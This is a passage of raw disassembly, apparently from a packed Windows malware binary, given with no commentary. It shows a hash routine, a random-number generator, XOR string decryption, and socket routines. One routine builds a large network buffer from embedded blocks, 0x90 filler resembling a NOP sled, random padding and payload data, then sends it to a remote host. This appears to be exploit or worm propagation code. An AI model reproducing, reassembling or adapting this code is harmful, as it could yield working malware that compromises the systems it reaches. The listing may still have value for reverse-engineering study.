mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_20]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+655B59C3h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_44]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-70F3336Eh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_28]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-100B83h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-7A7BA22Fh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_30]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+6FA87E4Fh]
loc_41005C: ; DATA XREF: .packed:off_41A8CC�o
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_14]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-1D31920h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_38]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-5CFEBCECh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+4E0811A1h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_40]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-8AC817Eh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_24]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-42C50DCBh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_48]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+2AD7D2BBh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-14792C6Fh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
mov eax, [eax]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [ecx], eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
mov eax, [ebp+arg_0]
mov eax, [eax+8]
add eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov eax, [ebp+arg_0]
mov eax, [eax+0Ch]
add eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov [ecx+0Ch], eax
leave
retn
sub_40F3CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410244 proc near ; CODE XREF: sub_40F3CE+F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
and [ebp+var_8], 0
jmp short loc_410263
; ---------------------------------------------------------------------------
loc_410253: ; CODE XREF: sub_410244+66�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
add eax, 4
mov [ebp+var_8], eax
loc_410263: ; CODE XREF: sub_410244+D�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnb short locret_4102AC
mov eax, [ebp+arg_4]
add eax, [ebp+var_8]
movzx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx+1]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx+2]
shl ecx, 10h
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx+3]
shl ecx, 18h
or eax, ecx
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
mov [edx+ecx*4], eax
jmp short loc_410253
; ---------------------------------------------------------------------------
locret_4102AC: ; CODE XREF: sub_410244+25�j
leave
retn
sub_410244 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4102AE proc near ; CODE XREF: sub_4167F1+DF�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push 0F0000000h
push 1
push 0
push 0
lea eax, [ebp+var_4]
push eax
call dword_417024 ; CryptAcquireContextA
push offset dword_41EADC
push 4
push [ebp+var_4]
call dword_417020 ; CryptGenRandom
push offset dword_41EAE0
push 4
push [ebp+var_4]
call dword_417020 ; CryptGenRandom
push offset dword_41EAE4
push 4
push [ebp+var_4]
call dword_417020 ; CryptGenRandom
push offset dword_41EAE8
push 4
push [ebp+var_4]
call dword_417020 ; CryptGenRandom
push 0
push [ebp+var_4]
call dword_41701C ; CryptReleaseContext
leave
retn
sub_4102AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410318 proc near ; CODE XREF: sub_4103F5+6�p
; sub_410422+6�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
lock xadd dword_41EADC, eax
add eax, ebx
lock xadd dword_41EAE0, eax
add eax, ecx
lock xadd dword_41EAE4, eax
add eax, edx
lock xadd dword_41EAE8, eax
add eax, esi
lock xadd dword_41EADC, eax
add eax, edi
lock xadd dword_41EAE0, eax
add eax, ebp
lock xadd dword_41EAE4, eax
add eax, esp
lock xadd dword_41EAE8, eax
call sub_416B64 ; clock
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
lock xadd dword_41EADC, eax
lock xadd dword_41EAE0, eax
lock xadd dword_41EAE4, eax
lock xadd dword_41EAE8, eax
add ecx, ebx
ror ebx, cl
lock xadd dword_41EAE4, ebx
add ecx, ecx
ror ecx, cl
lock xadd dword_41EAE0, ecx
add ecx, edx
ror edx, cl
lock xadd dword_41EADC, edx
rol eax, cl
add ecx, eax
ror ebx, cl
add ecx, ebx
ror ecx, cl
add ecx, 211h
rol edx, cl
add ecx, edx
lock xadd dword_41EAE8, edx
lock xadd dword_41EAE4, ecx
lock xadd dword_41EAE0, ebx
lock xadd dword_41EADC, eax
pop edi
pop esi
pop ebx
leave
retn
sub_410318 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4103F5 proc near ; CODE XREF: sub_4020C2+10B�p
; sub_4040E8+2D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EAE8, eax
mov ecx, [ebp+arg_4]
sub ecx, [ebp+arg_0]
xor edx, edx
inc ecx
div ecx
mov eax, edx
add eax, [ebp+arg_0]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4103F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410422 proc near ; CODE XREF: sub_40CF2F:loc_40CFBC�p
; sub_40D871+D3F�p ...
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EAE8, eax
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410422 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41043F proc near ; CODE XREF: sub_4055E5+715�p
; sub_4055E5+78B�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EAE4, eax
and eax, 0FFFFh
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41043F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410461 proc near ; CODE XREF: sub_4104A3+42�p
; sub_4125DF:loc_4126B8�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EAE0, eax
and eax, 0FFh
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410461 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410483 proc near ; CODE XREF: sub_4055E5+72B�p
; sub_40D7E5+57�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EADC, eax
and eax, 1
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410483 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4104A3 proc near ; CODE XREF: sub_40A9CF+D4C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jnz short loc_4104AF
jmp short locret_4104FF
; ---------------------------------------------------------------------------
loc_4104AF: ; CODE XREF: sub_4104A3+8�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_4104B5: ; CODE XREF: sub_4104A3+34�j
cmp [ebp+arg_4], 3
jbe short loc_4104D9
call sub_410422
mov ecx, [ebp+var_4]
mov [ecx], eax
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
sub eax, 4
mov [ebp+arg_4], eax
jmp short loc_4104B5
; ---------------------------------------------------------------------------
loc_4104D9: ; CODE XREF: sub_4104A3+16�j
mov eax, [ebp+var_4]
mov [ebp+arg_0], eax
loc_4104DF: ; CODE XREF: sub_4104A3+5A�j
cmp [ebp+arg_4], 0
jbe short locret_4104FF
call sub_410461
mov ecx, [ebp+arg_0]
mov [ecx], al
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_4]
dec eax
mov [ebp+arg_4], eax
jmp short loc_4104DF
; ---------------------------------------------------------------------------
locret_4104FF: ; CODE XREF: sub_4104A3+A�j
; sub_4104A3+40�j
leave
retn
sub_4104A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410501 proc near ; CODE XREF: sub_403260+36�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jnz short loc_410510
xor eax, eax
jmp short locret_41055D
; ---------------------------------------------------------------------------
loc_410510: ; CODE XREF: sub_410501+9�j
cmp [ebp+arg_10], 0
jnz short loc_41051C
mov eax, [ebp+arg_4]
mov [ebp+arg_10], eax
loc_41051C: ; CODE XREF: sub_410501+13�j
push [ebp+arg_10]
push [ebp+arg_4]
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov [ebp+var_4], eax
loc_410532: ; CODE XREF: sub_410501+57�j
cmp [ebp+var_4], 0
jbe short loc_41055A
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
mov [ecx], al
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
jmp short loc_410532
; ---------------------------------------------------------------------------
loc_41055A: ; CODE XREF: sub_410501+35�j
mov eax, [ebp+var_8]
locret_41055D: ; CODE XREF: sub_410501+D�j
leave
retn
sub_410501 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41055F proc near ; CODE XREF: sub_4167F1+F0�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
lea eax, [ebp+var_58]
push eax
call sub_40F11F
pop ecx
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_58]
push eax
call sub_40F159
add esp, 0Ch
lea eax, [ebp+var_58]
push eax
push offset byte_41EAF0
call sub_40F26E
pop ecx
pop ecx
lea esi, byte_41EAF0
mov edi, esi
push 10h
pop ecx
loc_41059F: ; CODE XREF: sub_41055F+47�j
lodsb
or eax, 80h
stosb
loop loc_41059F
pop edi
pop esi
pop ebx
leave
retn
sub_41055F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105AD proc near ; CODE XREF: sub_406E8E+C6�p
; sub_406E8E+14A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
cmp eax, 7Fh
jle short loc_4105BE
jmp short locret_4105F9
; ---------------------------------------------------------------------------
loc_4105BE: ; CODE XREF: sub_4105AD+D�j
and [ebp+var_4], 0
jmp short loc_4105CB
; ---------------------------------------------------------------------------
loc_4105C4: ; CODE XREF: sub_4105AD+4A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4105CB: ; CODE XREF: sub_4105AD+15�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short locret_4105F9
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, byte_41EAF0[edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_4105C4
; ---------------------------------------------------------------------------
locret_4105F9: ; CODE XREF: sub_4105AD+F�j
; sub_4105AD+29�j
leave
retn
sub_4105AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105FB proc near ; CODE XREF: sub_401000+4A�p
; sub_4043E9+1A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
cmp eax, 7Fh
jg short loc_41060C
jmp short locret_410647
; ---------------------------------------------------------------------------
loc_41060C: ; CODE XREF: sub_4105FB+D�j
and [ebp+var_4], 0
jmp short loc_410619
; ---------------------------------------------------------------------------
loc_410612: ; CODE XREF: sub_4105FB+4A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_410619: ; CODE XREF: sub_4105FB+15�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short locret_410647
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, byte_41EAF0[edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_410612
; ---------------------------------------------------------------------------
locret_410647: ; CODE XREF: sub_4105FB+F�j
; sub_4105FB+29�j
leave
retn
sub_4105FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410649 proc near ; DATA XREF: .packed:off_41CCFE�o
var_1B78 = dword ptr -1B78h
var_1B74 = byte ptr -1B74h
var_B74 = byte ptr -0B74h
var_B6C = dword ptr -0B6Ch
var_B64 = dword ptr -0B64h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = byte ptr -36Ch
var_280 = byte ptr -280h
var_276 = byte ptr -276h
var_272 = byte ptr -272h
var_23A = byte ptr -23Ah
var_236 = byte ptr -236h
var_232 = byte ptr -232h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1B78h
call sub_416BC0
push 48h
push offset dword_41A7B0
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 0EA60h
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_410686
jmp locret_410B50
; ---------------------------------------------------------------------------
loc_410686: ; CODE XREF: sub_410649+36�j
push 0
push 1000h
lea eax, [ebp+var_1B74]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call dword_417248 ; recv
push 7
push offset dword_41A7A8
mov eax, [ebp+arg_0]
push dword ptr [eax+2Ah]
mov eax, [ebp+arg_0]
add eax, 146h
push eax
mov eax, [ebp+arg_0]
add eax, 0C6h
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+0C2h]
push 200h
lea eax, [ebp+var_200]
push eax
call sub_4125DF
add esp, 20h
mov [ebp+var_370], eax
cmp [ebp+var_370], 0
jnz short loc_4106F0
jmp locret_410B50
; ---------------------------------------------------------------------------
loc_4106F0: ; CODE XREF: sub_410649+A0�j
and [ebp+var_374], 0
jmp short loc_410706
; ---------------------------------------------------------------------------
loc_4106F9: ; CODE XREF: sub_410649+E1�j
mov eax, [ebp+var_374]
inc eax
mov [ebp+var_374], eax
loc_410706: ; CODE XREF: sub_410649+AE�j
cmp [ebp+var_374], 168h
jge short loc_41072C
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+var_374]
mov [ebp+ecx+var_36C], al
jmp short loc_4106F9
; ---------------------------------------------------------------------------
loc_41072C: ; CODE XREF: sub_410649+C7�j
push 0Ah
push offset loc_41A8A0
lea eax, [ebp+var_280]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 2
push offset loc_41A8F0
lea eax, [ebp+var_276]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset loc_41A8E8
lea eax, [ebp+var_272]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 2
push offset loc_41A8EC
lea eax, [ebp+var_23A]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push (offset loc_41A8E3+1)
lea eax, [ebp+var_236]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 0Bh
push offset loc_41A894
lea eax, [ebp+var_232]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, 3E6h
sub eax, [ebp+var_370]
mov [ebp+var_204], eax
and [ebp+var_1B78], 0
push 18h
push offset dword_41A7FC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 18h
mov [ebp+var_1B78], eax
push 44h
push offset dword_41A818
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 44h
mov [ebp+var_1B78], eax
push 20h
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 20h
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8AC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8E0
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push offset dword_41A8D8
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8DC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 58h
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 58h
mov [ebp+var_1B78], eax
push 6
push offset loc_41A8B4
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 6
mov [ebp+var_1B78], eax
push 8
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 8
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8BC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 6
push offset loc_41A8C4
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 6
mov [ebp+var_1B78], eax
push [ebp+var_204]
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, [ebp+var_204]
mov [ebp+var_1B78], eax
push [ebp+var_370]
lea eax, [ebp+var_200]
push eax
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, [ebp+var_370]
mov [ebp+var_1B78], eax
push 168h
lea eax, [ebp+var_36C]
push eax
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 168h
mov [ebp+var_1B78], eax
push 0Ah
push offset off_41A8CC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 0Ah
mov [ebp+var_1B78], eax
push 32h
push offset dword_41A860
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 32h
mov [ebp+var_1B78], eax
mov eax, [ebp+var_1B78]
mov [ebp+var_B6C], eax
mov eax, [ebp+var_1B78]
sub eax, 18h
mov [ebp+var_B64], eax
push [ebp+var_1B78]
lea eax, [ebp+var_B74]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 0EA60h
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_410B36
jmp short locret_410B50
; ---------------------------------------------------------------------------
loc_410B36: ; CODE XREF: sub_410649+4E9�j
push 0
push 1000h
lea eax, [ebp+var_1B74]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call dword_417248 ; recv
locret_410B50: ; CODE XREF: sub_410649+38�j
; sub_410649+A2�j ...
leave
retn
sub_410649 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410B52 proc near ; DATA XREF: .packed:0041CD38�o
var_104C = byte ptr -104Ch
var_FC6 = byte ptr -0FC6h
var_BDE = byte ptr -0BDEh
var_B9E = byte ptr -0B9Eh
var_B7C = dword ptr -0B7Ch
var_B78 = byte ptr -0B78h
var_AF2 = byte ptr -0AF2h
var_88E = byte ptr -88Eh
var_882 = byte ptr -882h
var_85E = byte ptr -85Eh
var_852 = byte ptr -852h
var_82E = byte ptr -82Eh
var_80C = byte ptr -80Ch
var_7CC = byte ptr -7CCh
var_7C8 = byte ptr -7C8h
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 104Ch
call sub_416BC0
push 7
push offset dword_41A7A8
mov eax, [ebp+arg_0]
push dword ptr [eax+2Ah]
mov eax, [ebp+arg_0]
add eax, 146h
push eax
mov eax, [ebp+arg_0]
add eax, 0C6h
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+0C2h]
push 200h
lea eax, [ebp+var_204]
push eax
call sub_4125DF
add esp, 20h
mov [ebp+var_20C], eax
cmp [ebp+var_20C], 0
jnz short loc_410BAF
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410BAF: ; CODE XREF: sub_410B52+56�j
push 89h
push offset dword_41AF50
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410BEF
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410BEF: ; CODE XREF: sub_410B52+96�j
push 0A8h
push offset dword_41AFDC
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410C2F
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410C2F: ; CODE XREF: sub_410B52+D6�j
push 0DEh
push offset dword_41B088
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410C6F
jmp locret_410F5E
